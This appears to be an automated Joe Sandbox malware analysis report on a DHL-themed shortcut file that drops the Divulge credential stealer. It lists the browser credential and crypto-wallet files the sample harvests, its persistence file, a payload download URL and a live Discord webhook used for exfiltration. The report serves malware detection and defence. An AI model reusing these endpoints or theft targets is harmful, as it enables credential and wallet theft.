Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\Downloads\setup_x86.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies the hosts file

Source: C:\Users\user\Downloads\setup_x86.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: powershell.exe, 00000015.00000002.2761797867.0000023C20B0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ows Defender\MsMpeng.exe
Source: powershell.exe, 00000015.00000002.2761797867.0000023C20AB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2761797867.0000023C20B0F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntiVirusProduct

Stealing of Sensitive Information

Yara detected Divulge Stealer

Source: Yara match

File source: Process Memory Space: setup_x86.exe PID: 1220, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp	String found in binary or memory: Electrum
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F3189E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\$Recycle.Bin\Jaxx
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 3C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F3189E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\$Recycle.Bin\Exodus
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 1C:\Users\user\AppData\Roaming\Binance\wallets8
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F3189E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: C:\$Recycle.Bin\Ethereum
Source: setup_x86.exe, 00000003.00000002.2836477844.000001F318682000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 7C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000000.00000002.2219498741.00007FFD34A90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Downloads\setup_x86.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match	File source: 3.0.setup_x86.exe.1f316940000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2836477844.000001F318682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: setup_x86.exe PID: 1220, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\Downloads\setup_x86.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr, type: DROPPED

Remote Access Functionality

Yara detected Divulge Stealer

Source: Yara match

File source: Process Memory Space: setup_x86.exe PID: 1220, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	12 Registry Run Keys / Startup Folder	11 Process Injection	21 Disable or Modify Tools	LSASS Memory	22 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	11 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	131 Security Software Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	11 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	41 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL AWB-documents.lnk	47%	Virustotal		Browse
DHL AWB-documents.lnk	34%	ReversingLabs	Win32.Trojan.Jatommy
DHL AWB-documents.lnk	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr	100%	Avira	HEUR/AGEN.1307507
C:\Users\user\Downloads\setup_x86.exe	100%	Avira	HEUR/AGEN.1307507
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr	100%	Joe Sandbox ML
C:\Users\user\Downloads\setup_x86.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr	88%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla
C:\Users\user\Downloads\setup_x86.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.Zilla

Name	IP	Active	Malicious	Reputation
files.catbox.moe	108.181.20.35	true	false	high
discord.com	162.159.138.232	true	false	high
ip-api.com	208.95.112.1	true	false	high

Contacted URLs

Name	Malicious	Reputation
https://files.catbox.moe/l2rczc.pif	false	high
http://ip-api.com/json/?fields=225545	false	high
https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000000.00000002.2196008997.0000017D5DA02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2212946133.0000017D6C092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2212946133.0000017D6C1D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2307911377.000002286BC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2539623035.000001D46864E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2539623035.000001D468784000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2446999443.000001D459F8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C09D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2731271998.0000023C184E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000010.00000002.2446999443.000001D459A73000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discord.com	setup_x86.exe, 00000003.00000002.2836477844.000001F3188CA000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F3188A5000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discord.com/api/v10/users/	setup_x86.exe.0.dr	false	high
https://files.catbox.	powershell.exe, 00000000.00000002.2194606732.0000017D59E75000.00000004.00000020.00020000.00000000.sdmp	true	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000015.00000002.2580598582.0000023C086A2000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000004.00000002.2251492345.000002285BDD9000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000015.00000002.2580598582.0000023C086A2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://go.micro	powershell.exe, 00000000.00000002.2196008997.0000017D5CC52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C09915000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discordapp.com/api/v9/users/	setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, 8mzJ3.scr.3.dr, setup_x86.exe.0.dr	false	high
https://contoso.com/Icon	powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/PyDevOG/Divulge-StealerX	setup_x86.exe, 00000003.00000002.2836477844.000001F3188A5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://discord.com	setup_x86.exe, 00000003.00000002.2836477844.000001F3188CA000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F3188A5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.microsoft.	powershell.exe, 00000000.00000002.2195462631.0000017D5BEA6000.00000004.00000020.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000015.00000002.2580598582.0000023C086A2000.00000004.00000800.00020000.00000000.sdmp	false	high
https://files.catbox.moe;	powershell.exe, 00000000.00000002.2196008997.0000017D5D63B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2196008997.0000017D5D60C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000004.00000002.2251492345.000002285BDD9000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000000.00000002.2196008997.0000017D5DA02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2212946133.0000017D6C092000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2212946133.0000017D6C1D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2307911377.000002286BC23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2539623035.000001D46864E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2539623035.000001D468784000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2446999443.000001D459F8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C09D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2731271998.0000023C184E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2731271998.0000023C18624000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ip-api.com	setup_x86.exe, 00000003.00000002.2836477844.000001F318807000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F31871C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/PyDevOG/Divulge-Stealer	setup_x86.exe.0.dr	false	high
https://oneget.orgX	powershell.exe, 00000010.00000002.2446999443.000001D459A73000.00000004.00000800.00020000.00000000.sdmp	false	high
https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8Ts	setup_x86.exe, 00000003.00000002.2836477844.000001F318621000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F3188CA000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F3188A5000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.microsoft.coY	powershell.exe, 00000000.00000002.2216170840.0000017D74070000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://aka.ms/pscore68	powershell.exe, 00000000.00000002.2196008997.0000017D5C021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2251492345.000002285BBB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350960901.0000023A64553000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350960901.0000023A6456E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2446999443.000001D4585D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C08471000.00000004.00000800.00020000.00000000.sdmp	false	high
https://files.catbox.moe	powershell.exe, 00000000.00000002.2196008997.0000017D5CC52000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ip-api.com/json/?fields=225545P	setup_x86.exe, 00000003.00000002.2836477844.000001F318807000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000000.00000002.2196008997.0000017D5C021000.00000004.00000800.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2836477844.000001F318621000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2251492345.000002285BBB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2350960901.0000023A64618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2446999443.000001D4585D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2580598582.0000023C08471000.00000004.00000800.00020000.00000000.sdmp	false	high
https://oneget.org	powershell.exe, 00000010.00000002.2446999443.000001D459A73000.00000004.00000800.00020000.00000000.sdmp	false	high
http://files.catbox.moe	powershell.exe, 00000000.00000002.2196008997.0000017D5D60C000.00000004.00000800.00020000.00000000.sdmp	false	high
http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-	setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, 8mzJ3.scr.3.dr, setup_x86.exe.0.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
162.159.138.232	discord.com	United States	13335	CLOUDFLARENETUS	false
108.181.20.35	files.catbox.moe	Canada	852	ASN852CA	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1579624
Start date and time:	2024-12-23 06:40:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DHL AWB-documents.lnk
Detection:	MAL
Classification:	mal100.troj.adwa.spyw.evad.winLNK@29/26@3/3
EGA Information:	Successful, ratio: 16.7%
HCA Information:	Successful, ratio: 66% Number of executed functions: 261 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .lnk

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 13.107.246.63, 4.175.87.197
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2084 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2828 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3224 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4024 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6872 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:41:02	API Interceptor	64x Sleep call for process: powershell.exe modified
00:41:27	API Interceptor	10617x Sleep call for process: setup_x86.exe modified
00:41:28	API Interceptor	4x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	main.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, PRYSMAX STEALER	Browse	ip-api.com/json/8.46.123.189?fields=192511
	main.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189?fields=192511
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	ip-api.com/json/?fields=225545
	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	fvbhdyuJYi.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	8DiSW8IPEF.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	twE44mm07j.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	ip-api.com/line/?fields=hosting
	KJhsNv2RcI.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
162.159.138.232	http://mee6.xyz	Get hash	malicious	Unknown	Browse
	webhook.exe	Get hash	malicious	Unknown	Browse
	chos.exe	Get hash	malicious	Unknown	Browse
	apDMcnqqWs.exe	Get hash	malicious	Unknown	Browse
	Cooperative Agreement0000800380.docx.exe	Get hash	malicious	Babadeda, Blank Grabber	Browse
	speedymaqing.exe	Get hash	malicious	Python Stealer, Discord Token Stealer	Browse
	RuntimeusererVers.exe	Get hash	malicious	Python Stealer	Browse
	file.exe	Get hash	malicious	CStealer	Browse
	dens.exe	Get hash	malicious	Python Stealer, Exela Stealer, Waltuhium Grabber	Browse
	yuki.exe	Get hash	malicious	Luna Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	http://mee6.xyz	Get hash	malicious	Unknown	Browse	162.159.138.232
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	YF3YnL4ksc.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	arm.elf	Get hash	malicious	Unknown	Browse	162.159.137.232
	webhook.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	zapret.exe	Get hash	malicious	Unknown	Browse	162.159.136.232
	Bloxflip Predictor.exe	Get hash	malicious	Njrat	Browse	162.159.137.232
	chos.exe	Get hash	malicious	Unknown	Browse	162.159.138.232
	phost.exe	Get hash	malicious	Blank Grabber	Browse	162.159.137.232
	ihost.exe	Get hash	malicious	Python Stealer, Muck Stealer	Browse	162.159.136.232
ip-api.com	main.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, PRYSMAX STEALER	Browse	208.95.112.1
	main.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	fvbhdyuJYi.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	8DiSW8IPEF.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	twE44mm07j.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	YgJ5inWPQO.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	KJhsNv2RcI.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
files.catbox.moe	doc00290320092.jse	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	108.181.20.35
	TT copy.js	Get hash	malicious	FormBook	Browse	108.181.20.35
	z68scancopy.vbs	Get hash	malicious	FormBook	Browse	108.181.20.35
	2zirzlMVqX.bat	Get hash	malicious	Xmrig	Browse	108.181.20.35
	QwLii5vouB.exe	Get hash	malicious	Unknown	Browse	108.181.20.35
	PO Huaruicarbon 98718.html	Get hash	malicious	CorporateDataTheft, HTMLPhisher	Browse	108.181.20.35
	5QnwxSJVyX.doc	Get hash	malicious	Unknown	Browse	108.181.20.35
	file.exe	Get hash	malicious	FormBook	Browse	108.181.20.35
	file.exe	Get hash	malicious	FormBook	Browse	108.181.20.35
	https://drive.google.com/uc?export=download&id=11w_oRLtDWJl2z1SKN0zkobTHd_Ix44t9	Get hash	malicious	Unknown	Browse	108.181.20.35

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	uZO96rXyWt.exe	Get hash	malicious	LummaC	Browse	104.21.66.86
	trZG6pItZj.exe	Get hash	malicious	Vidar	Browse	172.64.41.3
	fKdiT1D1dk.exe	Get hash	malicious	RHADAMANTHYS	Browse	104.16.249.249
	fKdiT1D1dk.exe	Get hash	malicious	RHADAMANTHYS	Browse	104.16.248.249
	https://clicks.icims.com/f/a/5aA63l6Vdy8mmO6SfnFRFQ~~/AAIB5gA~/RgRpSzdjP0SjaHR0cHM6Ly9sb2dpbi5pY2ltcy5jb20vdS9yZXNldC12ZXJpZnk_dGlja2V0PVYzbldUZVAzTUxqc0hwVzlXOFlZbFhxamh5SFJZR0tHI2NsaWVudElkPUtKQTk1RHhIT1BOTzU2VWFOUmRSWTU3cHpuNkNNSGNtJmNsaWVudE5hbWU9QXBwbGljYW50IFRyYWNraW5nJmNhbGxiYWNrVXJsPVcDc3BjQgpnZWOyaGeuoGU9UhltaWthLnlhbWFndWNoaUBoYXlzLmNvLmpwWAQAABLw	Get hash	malicious	Unknown	Browse	162.247.243.29
	http://217.28.130.10/8265/568747470733a2f2f6d61696c2d6864656c2e6c7664642e696e666f2f3f656d61696c3d62722e73756e67406864656c2e636f2e6b72	Get hash	malicious	Unknown	Browse	172.67.191.167
	Echelon.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.154.166
	Neverlose.cc.exe	Get hash	malicious	LummaC	Browse	172.67.157.254
	setup.msi	Get hash	malicious	Unknown	Browse	104.21.65.145
	bas.exe	Get hash	malicious	LummaC	Browse	104.21.71.155
ASN852CA	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	50.99.128.40
	nshkarm7.elf	Get hash	malicious	Mirai	Browse	75.155.101.200
	nsharm7.elf	Get hash	malicious	Mirai	Browse	96.1.63.87
	nshmpsl.elf	Get hash	malicious	Mirai	Browse	207.81.21.91
	mipsel.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	142.59.130.233
	arm.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	64.114.227.13
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	209.202.108.226
	nsharm.elf	Get hash	malicious	Mirai	Browse	172.218.17.226
